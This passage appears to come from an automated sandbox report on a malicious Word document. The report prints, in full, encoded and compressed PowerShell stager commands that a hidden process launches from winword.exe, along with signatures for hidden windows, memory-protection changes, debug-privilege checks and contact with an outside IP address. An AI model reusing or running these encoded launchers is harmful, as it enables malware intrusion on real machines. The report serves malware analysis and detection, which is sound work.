AeQBSAHoAMgBTAGwAdABvADQAOQBoAGsAWgBrAGQAVQBTAHIARgB5AFIAMABEAGgAWQA2AGoAcQBvADMAZgBFADEAMABRAHAAeAB4AGwAaABSACsAUgBNADMAVwBwADkAcwBqADUAagA5AHIAcABIADIAMQBBAGkAMABIAEoASABvAFIAUwBqAGgARAAxAG4AMgB1AEoAOAB4AGMAcgBCAFQAbgB3AGsAVABpAHEANwBEAGsAeABjAGUATQBQAHQANgBkAG4AcAAyAHUAbgBwAGsAeQBLAHUAbgBEAEkASABSAHkAVwBJAC8ASgBoAEMAWAA1AHYAQwBVADcAcgBYAGUASwBXAFoAUgA2AGMARQBlAFcAUABCAGsAQgA5AFAAQwBWAFoASQBSAGYAZgBtAEkAcQBsAEkAZwBaAHEALwA0AGMALwBQAHkAVQBSAGMAMABIADIANQBBAHMAQgBoAHoANgBpAC8AQgBJAEsAOQBpAHcAVgA5AC8AawB1AEsAZgBrADcARgBPAFYAagBRAG0AOQBWADIATQBJACsAbwBkACsAYQBZADkAaAB5ADEAWgBNAGIATABQAHIAbgBSAFUANgAwAE4ARQBtAHAAbwB2AEUATAA5AE8ARwBBAG0AdwBrAEgAagBKAEUAdgA5AGcAMQBvAGkAbwBlAEwAUwAxAE0AcwBwADgAawBpAEEAUAA2AHAATgBDAFYARgBBADYALwBmAHQAZwBEAGkAWABRADEARQA3AGMASQB4AEgAZwBjADUAZwBEADUAdwBvAHIAWQBEAGsANQBhAHUAZgBNADMAaAAxADMAbAAzAE4AUQBVAG0AMgBHADAANwBTAG8ATwBCAGsAYwBNADYAKwBvAHUAQQBRAHoANABoAGMAVgBGAEsAYwAwAFgAMABLAFoANABQAHUAaAArAGkAMwBjAFgAcwBZAEUAOQBYAEEAcQBqAHUANgBXAGUAZwA1AGoAdgBwADMATgA0ADEAUQBrAG0AUQBjAFYAZwA5AFMAdgAzAEEAMwB4AEsARwBZAFMAaQBhAEwAUwBwAGoANgB4AGQAaQA0AE4AagB0AHUAcQB6ACsASgBnAFkAOABhAEEALwBlAEQAcABEAHUAbwBBAEUAcABtAC8ASwB5AFEAUABFAG8AaABRADEAbAB3AHYAdQBVAFIAMABvAGcAMABqAEUAYQBqAHMAVAAzAHUAVAA0AFEARABPAGQAawA3AHgAUABXADkAdwBRAEgAegAxAFgALwBFAGQATwBYAHcAZwByAEEAVABpAGkATQBDAFQANgBLAEMANgBMAHUATwBpAHEASQB4AHAASQBxAEIAbgBTAEYAQQBmAGIAdgA3AFQAMQBrADkAYQBoAFEAegBDAFQAawBoAGUAQQArADEANABLAEIAYgBXAFQAawBnAHkARgB6AGcAbQBEAFUAdQB5AE0AWQBkAGsARAAwAEEAaQBJAFAAbABtAHcAaQBNAEwAcAArAFIAMQA3AGQAQQBZAHQAQgBmAEcAZwBEAG8ASQBuAGwAbQA5ADcAVgBJAHkAWAB0AE4AeQBaAHcAdgBmAEgAbgB5AHYAZQA2AHUAWABYAFkAOABHAGoAagBCADUAMQBQAFAAcwAxAEcAawAxADMAeQBLADYARABiAGIAZQAyAHoANwB5AC8AUABjACsAdQBYAEQASABOAGUARQAyAE8AcwBKADIAVQBIAHQASQBUAGEAcwBXAGUAcABaADUASgBjAGYAbABJAEUAQgArAEgAMgBUAEIATABQAFMAWQA2AFQAVABXADkAMABZAHQATgBlAG0AMgBQAFoARwArAEQAagA2ADgAVwBxADAAOQBOAFYARwAxAFcAaAB0AFUAegBUAFgAQQBOAGcATwA3AE4AZABoAEYAZABIAHYAZgBoAFQARgAwAHcARQBIAFgANgBxAFMAVwAyAFcARwBOADkALwBiAG8AWgBsAEoAcAB6AGkAZQBzAGIAZABTAGEANABXAHIAQwBVAC8AZgAxAHIARwA0AFkAeABvAFcAUAA2ADcAMABkAFEAaABiADMAcQA3ADMAZAB0AEQAegBpAFYAMgAwAHYAcwBtAG8AeABOAHkANwBzADIAaABvADEARQBMAEwAagB4AHIAaABwADgAUQA4AHoASwAwAEcATwBNAGMAYgBCAGgAcQBlADMAYgA2AHIAWgBKAEwAQwBSAFAAYgBBAHAAbQBRACsAdgBtADkAWgB3ADIATABUAFEAZABlAHYAMgBjAC8AMwBDAEMASQB5AEwAeQBSAFMASAAxAG0AUgBjAG8AZgBQAE4AZABCAFQAQwB2AEwAbAB0AEQAegA4AFkAWgBxADMAagBrAHcAYwArADMAdwBKAHcATABZADUAdwBNAEEASwBkAHcASwA1ADQANABRAHAAMAA2AGkAKwBSADkAYgBMAFAAMAB3AHAAZQBXAHgAeABaAG8ATgBPAGMAZgAwAGEAdABjAEwAWgBwAE8AZwB6AFcAcgA2ADQAcgBIAEkAMQBaAGYANABwAFIAZAA3ADUAcgBHAGsAWgA1ADUAdABSAFEAMgArAFMAVABWAG8AQwBHAG8ASQA0AEQAYQA0AGgAUgBlAGwAZAAvAHEAQgB2AGwAcwBjAC8AOQB5AGEAdgArAGIARwBXAE0AcAArAHkATgBVAGIAZQBIAFQAagBpAFYATwBSAHUAYgBTAFAANQB1ADIALwBVAFAAMwByAHkAOAA5AFEAWgB2ADMAbgBZAG4AZABCAHgAeABkAEcAMABZADQAeABlAFMATQAwAEMAYQB3AHEAWQB1AFIAdAA0AFQATQB2AHkAcwBkAGYAZAB3AGsAbwBhAFkAQQBVAG0AZwBLAHgAOABQAFoAWgBNAG4AegBiAHoAVgBPAHAAeABLAEMAMAAyAEQAUwAzAGwATgBrAHAAZwB3AHUATgBmAGcANQBqAHQAUwBHAHoASABHAFAAZABuAGoAbwBTAFgARAA3AFgATABvACsAZgBJAEsAdQBvAFoAaAB0AGYATABzAFMARgBjAGUARgBmAFYAdgB2AGYAOABvAHUAcgB5AGMAUQA0AFIAdwBXAFAAWgA4AEwAbgBWAEoASABJAGkAdwBhAE4ANQBYAFQAUgBQAGEAdQBYAGwAZgBNAHkASABIADMAMAAvAEwANQBwAHUAZABkAHYAQgBWAGwAUABmAEIAQQBaAGwASAA5ADIAegB2AFgAcABjAEgAcQBjAEQAOAB2AHYAVgAvAFEAcABZAGYAMwBoAEQAKwAvAEYAOQBEADkAawAzADIAaQA5AFgAZgBnAHQARQBzADUAZwBuAC8ASQBQADkAZQA4AEUAZQBZAC8AbQBIAGUARQAwAHcARgA2AEwAbgBRAGUAUgBnADUAMwBIAHIAUABwAFoAKwBUADQAOABuAGIAZwBDAHcASQBWAEgANgBWAFAALwBKAFYAYgBwAEMASgA4AHoANgA4AEoASgB5AGQALwBnAE0AQgBTADkAOQBHAEwAdwBvAEEAQQBBAD0APQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
cmdline	"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAPtN2ECA7VWaW/bOBD9nAD5D0JhQBLqWPLRIwEKLCWfrQ/ZSnzWKBiJlhhToitRcZxu//sObTlNt2nRLrCCD3I4M5x58zjUKos9QXms4IHy5ez0xMEJjhSt4N8XlcJtR+gnJyAtBK+Vd4q2QJtNnUeYxsvLSztLEhKLw7zUIgKlKYluGCWppit/K5OQJOR8cHNLPKF8UQqfSi3GbzDL1XY29kKinKPYl2td7mEZR8ndMCo09eNHVV+cl5elxucMs1RT3V0qSFTyGVN15asuN7zabYim9qiX8JSvRGlC42qldB2neEX64O2O9IgIuZ+qOuQAn4SILIkVyEaaHxY1FYZOwj3k+wlJU7WoLKTjxXL5l7bIdx1lsaARKXViQRK+cUlyRz2Slto49hkZkdUSrFyR0DhY6jqo3fE10QpxxlhR+RM3Wp9sj5j9rpH21Ai0HJHoRSjhD1n2uJ8xcrBTnwkTiq7DkxceMPt6dnp2unpkyKunDIHRyWI/JhCX5vCU7rXeKWZR6cEeWPBkB9PCVZIRffmIqlIgZq/4c/PyURc0H25AsBhz6i/BIK9iwV9/kuKfk7FOVjQm9V2MI+od+aY9hy1ZMbLPrnRU60NEmpovEL9OGAmwkHjJEv9g1oioeLS1Msp8kiAP6pNCVFA6/ftgDiXQ1E7cIxHgc5gD5worYDk5aufM3h13l3NQUm2G07SoOBkcM6+ouAQz4hcVFKc0X0KZ4Puh+i3cXsYE9XAqju6Weg5jvp3N41QkmQcVg9Sv3A3xKGYSiaLSpj6xdi4Njtuqz+JgY8aA/eDpDuoAEpm/KyQPEohQ1lwvuUR0og0jEajsT3uT4QDOdk7xPW9wQHz1X/EdOXwgrATiiMCT6KC6LuOiqIxpIqBnSFAfbv7T1k9ahQzCTkheA+14KBbWTkgyFzgmDUuyMYdkD0AiIPlmwiMLp+R17dAYtBfGgDoInlm97VIyXtNyZwvfHnyve6uXXY8GjjB51PPs1Gk13yK6Dbbe2z7y/Pc+uXDHNeE2OsJ2UHtITasWepZ5JcflIEB+H2TBLPSY6TTW90YtNem2PZG+Dj68Wq09NVG1WhtUzTXANgO7NdhFdHvfhTF0wEHX6qSW2WGN9/boZlJpziesbdSa4WrCU/f1rG4YxoWP670dQhb3q73dtDziV20vsmoxNy7s2ho1ELLjxrhp8Q8zK0GOMcbBhqe3b6rZJLCRPbApmQ+vm9Zw2LTQdev2c/3CCIyLyRSH1mRcofPNdBTCvLltDz8YZq3jkwc+3wJwLY5wMAKdwK544Qp06i+R9bLP0wpeWxxZoNOcf0atcLZpOgzWr64rHI1Zf4pRd75rGkZ55tRQ2+STVoCGoI4Da4hReld/qBvlsc/9yav+bGWMp+yNUbeHTjiVORubSP5u2/UP3ry89QZv3nYndBxxdG0Y4xeSM0CawqYuRt4TMvysdfdwkoaYAUmgKx8PZZMnzbzVOpxKC02DS3lNkpgwuNfg5jtSGzHGPdnjoSXD7XLo+fIKuoZhtfLsSFceFfVvvf8ourycQ4RwWPZ8LnVJHIiwaN5XTRPauXlfMyHH30/L5puddvBVlPfBAZlH92zvXpcHqcD8vvV/QpYf3hD+/F9D9k32i9XfgtEs5gn/IP9e8EeY/mHeE0wF6LnQeRg53HrPpZ+T48nbgCwIVH6VP/JVbpCJ8z68JJyd/gMBS99GLwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Word document hooks document open

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 9, 2021, 9:07 p.m.	thread_identifier: 2972 thread_handle: 0x00000444 process_identifier: 2960 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAPtN2ECA7VWaW/bOBD9nAD5D0JhQBLqWPLRIwEKLCWfrQ/ZSnzWKBiJlhhToitRcZxu//sObTlNt2nRLrCCD3I4M5x58zjUKos9QXms4IHy5ez0xMEJjhSt4N8XlcJtR+gnJyAtBK+Vd4q2QJtNnUeYxsvLSztLEhKLw7zUIgKlKYluGCWppit/K5OQJOR8cHNLPKF8UQqfSi3GbzDL1XY29kKinKPYl2td7mEZR8ndMCo09eNHVV+cl5elxucMs1RT3V0qSFTyGVN15asuN7zabYim9qiX8JSvRGlC42qldB2neEX64O2O9IgIuZ+qOuQAn4SILIkVyEaaHxY1FYZOwj3k+wlJU7WoLKTjxXL5l7bIdx1lsaARKXViQRK+cUlyRz2Slto49hkZkdUSrFyR0DhY6jqo3fE10QpxxlhR+RM3Wp9sj5j9rpH21Ai0HJHoRSjhD1n2uJ8xcrBTnwkTiq7DkxceMPt6dnp2unpkyKunDIHRyWI/JhCX5vCU7rXeKWZR6cEeWPBkB9PCVZIRffmIqlIgZq/4c/PyURc0H25AsBhz6i/BIK9iwV9/kuKfk7FOVjQm9V2MI+od+aY9hy1ZMbLPrnRU60NEmpovEL9OGAmwkHjJEv9g1oioeLS1Msp8kiAP6pNCVFA6/ftgDiXQ1E7cIxHgc5gD5worYDk5aufM3h13l3NQUm2G07SoOBkcM6+ouAQz4hcVFKc0X0KZ4Puh+i3cXsYE9XAqju6Weg5jvp3N41QkmQcVg9Sv3A3xKGYSiaLSpj6xdi4Njtuqz+JgY8aA/eDpDuoAEpm/KyQPEohQ1lwvuUR0og0jEajsT3uT4QDOdk7xPW9wQHz1X/EdOXwgrATiiMCT6KC6LuOiqIxpIqBnSFAfbv7T1k9ahQzCTkheA+14KBbWTkgyFzgmDUuyMYdkD0AiIPlmwiMLp+R17dAYtBfGgDoInlm97VIyXtNyZwvfHnyve6uXXY8GjjB51PPs1Gk13yK6Dbbe2z7y/Pc+uXDHNeE2OsJ2UHtITasWepZ5JcflIEB+H2TBLPSY6TTW90YtNem2PZG+Dj68Wq09NVG1WhtUzTXANgO7NdhFdHvfhTF0wEHX6qSW2WGN9/boZlJpziesbdSa4WrCU/f1rG4YxoWP670dQhb3q73dtDziV20vsmoxNy7s2ho1ELLjxrhp8Q8zK0GOMcbBhqe3b6rZJLCRPbApmQ+vm9Zw2LTQdev2c/3CCIyLyRSH1mRcofPNdBTCvLltDz8YZq3jkwc+3wJwLY5wMAKdwK544Qp06i+R9bLP0wpeWxxZoNOcf0atcLZpOgzWr64rHI1Zf4pRd75rGkZ55tRQ2+STVoCGoI4Da4hReld/qBvlsc/9yav+bGWMp+yNUbeHTjiVORubSP5u2/UP3ry89QZv3nYndBxxdG0Y4xeSM0CawqYuRt4TMvysdfdwkoaYAUmgKx8PZZMnzbzVOpxKC02DS3lNkpgwuNfg5jtSGzHGPdnjoSXD7XLo+fIKuoZhtfLsSFceFfVvvf8ourycQ4RwWPZ8LnVJHIiwaN5XTRPauXlfMyHH30/L5puddvBVlPfBAZlH92zvXpcHqcD8vvV/QpYf3hD+/F9D9k32i9XfgtEs5gn/IP9e8EeY/mHeE0wF6LnQeRg53HrPpZ+T48nbgCwIVH6VP/JVbpCJ8z68JJyd/gMBS99GLwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000450	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 9, 2021, 9:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 9, 2021, 9:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

178.62.247.185

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

winword.exe

martian_process

powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFAAdABOADIARQBDAEEANwBWAFcAYQBXAC8AYgBPAEIARAA5AG4AQQBEADUARAAwAEoAaABRAEIATABxAFcAUABMAFIASQB3AEUASwBMAEMAVwBmAHIAUQAvAFoAUwBuAHoAVwBLAEIAaQBKAGwAaABoAFQAbwBpAHQAUgBjAFoAeAB1AC8ALwBzAE8AYgBUAGwATgB0ADIAbgBSAEwAcgBDAEMARAAzAEkANABNADUAeAA1ADgAegBqAFUASwBvAHMAOQBRAFgAbQBzADQASQBIAHkANQBlAHoAMAB4AE0ARQBKAGoAaABTAHQANABOADgAWABsAGMASgB0AFIAKwBnAG4ASgB5AEEAdABCAEsAKwBWAGQANABxADIAUQBKAHQATgBuAFUAZQBZAHgAcwB2AEwAUwB6AHQATABFAGgASwBMAHcANwB6AFUASQBnAEsAbABLAFkAbAB1AEcAQwBXAHAAcABpAHQALwBLADUATwBRAEoATwBSADgAYwBIAE4ATABQAEsARgA4AFUAUQBxAGYAUwBpADMARwBiAHoARABMADEAWABZADIAOQBrAEsAaQBuAEsAUABZAGwAMgB0AGQANwBtAEUAWgBSADgAbgBkAE0AQwBvADAAOQBlAE4ASABWAFYAKwBjAGwANQBlAGwAeAB1AGMATQBzADEAUgBUADMAVgAwAHEAUwBGAFQAeQBHAFYATgAxADUAYQBzAHUATgA3AHoAYQBiAFkAaQBtADkAcQBpAFgAOABKAFMAdgBSAEcAbABDADQAMgBxAGwAZABCADIAbgBlAEUAWAA2ADQATwAyAE8AOQBJAGcASQB1AFoAKwBxAE8AdQBRAEEAbgA0AFMASQBMAEkAawBWAHkARQBhAGEASAB4AFkAMQBGAFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBvAEwASwBUAGoAeABYAEwANQBsADcAYgBJAGQAeAAxAGwAcwBhAEEAUgBLAFgAVgBpAFEAUgBLACsAYwBVAGwAeQBSAHoAMgBTAGwAdABvADQAOQBoAGsAWgBrAGQAVQBTAHIARgB5AFIAMABEAGgAWQA2AGoAcQBvADMAZgBFADEAMABRAHAAeAB4AGwAaABSACsAUgBNADMAVwBwADkAcwBqADUAagA5AHIAcABIADIAMQBBAGkAMABIAEoASABvAFIAUwBqAGgARAAxAG4AMgB1AEoAOAB4AGMAcgBCAFQAbgB3AGsAVABpAHEANwBEAGsAeABjAGUATQBQAHQANgBkAG4AcAAyAHUAbgBwAGsAeQBLAHUAbgBEAEkASABSAHkAVwBJAC8ASgBoAEMAWAA1AHYAQwBVADcAcgBYAGUASwBXAFoAUgA2AGMARQBlAFcAUABCAGsAQgA5AFAAQwBWAFoASQBSAGYAZgBtAEkAcQBsAEkAZwBaAHEALwA0AGMALwBQAHkAVQBSAGMAMABIADIANQBBAHMAQgBoAHoANgBpAC8AQgBJAEsAOQBpAHcAVgA5AC8AawB1AEsAZgBrADcARgBPAFYAagBRAG0AOQBWADIATQBJACsAbwBkACsAYQBZADkAaAB5ADEAWgBNAGIATABQAHIAbgBSAFUANgAwAE4ARQBtAHAAbwB2AEUATAA5AE8ARwBBAG0AdwBrAEgAagBKAEUAdgA5AGcAMQBvAGkAbwBlAEwAUwAxAE0AcwBwADgAawBpAEEAUAA2AHAATgBDAFYARgBBADYALwBmAHQAZwBEAGkAWABRADEARQA3AGMASQB4AEgAZwBjADUAZwBEADUAdwBvAHIAWQBEAGsANQBhAHUAZgBNADMAaAAxADMAbAAzAE4AUQBVAG0AMgBHADAANwBTAG8ATwBCAGsAYwBNADYAKwBvAHUAQQBRAHoANABoAGMAVgBGAEsAYwAwAFgAMABLAFoANABQAHUAaAArAGkAMwBjAFgAcwBZAEUAOQBYAEEAcQBqAHUANgBXAGUAZwA1AGoAdgBwADMATgA0ADEAUQBrAG0AUQBjAFYAZwA5AFMAdgAzAEEAMwB4AEsARwBZAFMAaQBhAEwAUwBwAGoANgB4AGQAaQA0AE4AagB0AHUAcQB6ACsASgBnAFkAOABhAEEALwBlAEQAcABEAHUAbwBBAEUAcABtAC8ASwB5AFEAUABFAG8AaABRADEAbAB3AHYAdQBVAFIAMABvAGcAMABqAEUAYQBqAHMAVAAzAHUAVAA0AFEARABPAGQAawA3AHgAUABXADkAdwBRAEgAegAxAFgALwBFAGQATwBYAHcAZwByAEEAVABpAGkATQBDAFQANgBLAEMANgBMAHUATwBpAHEASQB4AHAASQBxAEIAbgBTAEYAQQBmAGIAdgA3AFQAMQBrADkAYQBoAFEAegBDAFQAawBoAGUAQQArADEANABLAEIAYgBXAFQAawBnAHkARgB6AGcAbQBEAFUAdQB5AE0AWQBkAGsARAAwAEEAaQBJAFAAbABtAHcAaQBNAEwAcAArAFIAMQA3AGQAQQBZAHQAQgBmAEcAZwBEAG8ASQBuAGwAbQA5ADcAVgBJAHkAWAB0AE4AeQBaAHcAdgBmAEgAbgB5AHYAZQA2AHUAWABYAFkAOABHAGoAagBCADUAMQBQAFAAcwAxAEcAawAxADMAeQBLADYARABiAGIAZQAyAHoANwB5AC8AUABjACsAdQBYAEQASABOAGUARQAyAE8AcwBKADIAVQBIAHQASQBUAGEAcwBXAGUAcABaADUASgBjAGYAbABJAEUAQgArAEgAMgBUAEIATABQAFMAWQA2AFQAVABXADkAMABZAHQATgBlAG0AMgBQAFoARwArAEQAagA2ADgAVwBxADAAOQBOAFYARwAxAFcAaAB0AFUAegBUAFgAQQBOAGcATwA3AE4AZABoAEYAZABIAHYAZgBoAFQARgAwAHcARQBIAFgANgBxAFMAVwAyAFcARwBOADkALwBiAG8AWgBsAEoAcAB6AGkAZQBzAGIAZABTAGEANABXAHIAQwBVAC8AZgAxAHIARwA0AFkAeABvAFcAUAA2ADcAMABkAFEAaABiADMAcQA3ADMAZAB0AEQAegBpAFYAMgAwAHYAcwBtAG8AeABOAHkANwBzADIAaABvADEARQBMAEwAagB4AHIAaABwADgAUQA4AHoASwAwAEcATwBNAGMAYgBCAGgAcQBlADMAYgA2AHIAWgBKAEwAQwBSAFAAYgBBAHAAbQBRACsAdgBtADkAWgB3ADIATABUAFEAZABlAHYAMgBjAC8AMwBDAEMASQB5AEwAeQBSAFMASAAxAG0AUgBjAG8AZgBQAE4AZABCAFQAQwB2AEwAbAB0AEQAegA4AFkAWgBxADMAagBrAHcAYwArADMAdwBKAHcATABZADUAdwBNAEEASwBkAHcASwA1ADQANABRAHAAMAA2AGkAKwBSADkAYgBMAFAAMAB3AHAAZQBXAHgAeABaAG8ATgBPAGMAZgAwAGEAdABjAEwAWgBwAE8AZwB6AFcAcgA2ADQAcgBIAEkAMQBaAGYANABwAFIAZAA3ADUAcgBHAGsAWgA1ADUAdABSAFEAMgArAFMAVABWAG8AQwBHAG8ASQA0AEQAYQA0AGgAUgBlAGwAZAAvAHEAQgB2AGwAcwBjAC8AOQB5AGEAdgArAGIARwBXAE0AcAArAHkATgBVAGIAZQBIAFQAagBpAFYATwBSAHUAYgBTAFAANQB1ADIALwBVAFAAMwByAHkAOAA5AFEAWgB2ADMAbgBZAG4AZABCAHgAeABkAEcAMABZADQAeABlAFMATQAwAEMAYQB3AHEAWQB1AFIAdAA0AFQATQB2AHkAcwBkAGYAZAB3AGsAbwBhAFkAQQBVAG0AZwBLAHgAOABQAFoAWgBNAG4AegBiAHoAVgBPAHAAeABLAEMAMAAyAEQAUwAzAGwATgBrAHAAZwB3AHUATgBmAGcANQBqAHQAUwBHAHoASABHAFAAZABuAGoAbwBTAFgARAA3AFgATABvACsAZgBJAEsAdQBvAFoAaAB0AGYATABzAFMARgBjAGUARgBmAFYAdgB2AGYAOABvAHUAcgB5AGMAUQA0AFIAdwBXAFAAWgA4AEwAbgBWAEoASABJAGkAdwBhAE4ANQBYAFQAUgBQAGEAdQBYAGwAZgBNAHkASABIADMAMAAvAEwANQBwAHUAZABkAHYAQgBWAGwAUABmAEIAQQBaAGwASAA5ADIAegB2AFgAcABjAEgAcQBjAEQAOAB2AHYAVgAvAFEAcABZAGYAMwBoAEQAKwAvAEYAOQBEADkAawAzADIAaQA5AFgAZgBnAHQARQBzADUAZwBuAC8ASQBQADkAZQA4AEUAZQBZAC8AbQBIAGUARQAwAHcARgA2AEwAbgBRAGUAUgBnADUAMwBIAHIAUABwAFoAKwBUADQAOABuAGIAZwBDAHcASQBWAEgANgBWAFAALwBKAFYAYgBwAEMASgA4AHoANgA4AEoASgB5AGQALwBnAE0AQgBTADkAOQBHAEwAdwBvAEEAQQBBAD0APQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAPtN2ECA7VWaW/bOBD9nAD5D0JhQBLqWPLRIwEKLCWfrQ/ZSnzWKBiJlhhToitRcZxu//sObTlNt2nRLrCCD3I4M5x58zjUKos9QXms4IHy5ez0xMEJjhSt4N8XlcJtR+gnJyAtBK+Vd4q2QJtNnUeYxsvLSztLEhKLw7zUIgKlKYluGCWppit/K5OQJOR8cHNLPKF8UQqfSi3GbzDL1XY29kKinKPYl2td7mEZR8ndMCo09eNHVV+cl5elxucMs1RT3V0qSFTyGVN15asuN7zabYim9qiX8JSvRGlC42qldB2neEX64O2O9IgIuZ+qOuQAn4SILIkVyEaaHxY1FYZOwj3k+wlJU7WoLKTjxXL5l7bIdx1lsaARKXViQRK+cUlyRz2Slto49hkZkdUSrFyR0DhY6jqo3fE10QpxxlhR+RM3Wp9sj5j9rpH21Ai0HJHoRSjhD1n2uJ8xcrBTnwkTiq7DkxceMPt6dnp2unpkyKunDIHRyWI/JhCX5vCU7rXeKWZR6cEeWPBkB9PCVZIRffmIqlIgZq/4c/PyURc0H25AsBhz6i/BIK9iwV9/kuKfk7FOVjQm9V2MI+od+aY9hy1ZMbLPrnRU60NEmpovEL9OGAmwkHjJEv9g1oioeLS1Msp8kiAP6pNCVFA6/ftgDiXQ1E7cIxHgc5gD5worYDk5aufM3h13l3NQUm2G07SoOBkcM6+ouAQz4hcVFKc0X0KZ4Puh+i3cXsYE9XAqju6Weg5jvp3N41QkmQcVg9Sv3A3xKGYSiaLSpj6xdi4Njtuqz+JgY8aA/eDpDuoAEpm/KyQPEohQ1lwvuUR0og0jEajsT3uT4QDOdk7xPW9wQHz1X/EdOXwgrATiiMCT6KC6LuOiqIxpIqBnSFAfbv7T1k9ahQzCTkheA+14KBbWTkgyFzgmDUuyMYdkD0AiIPlmwiMLp+R17dAYtBfGgDoInlm97VIyXtNyZwvfHnyve6uXXY8GjjB51PPs1Gk13yK6Dbbe2z7y/Pc+uXDHNeE2OsJ2UHtITasWepZ5J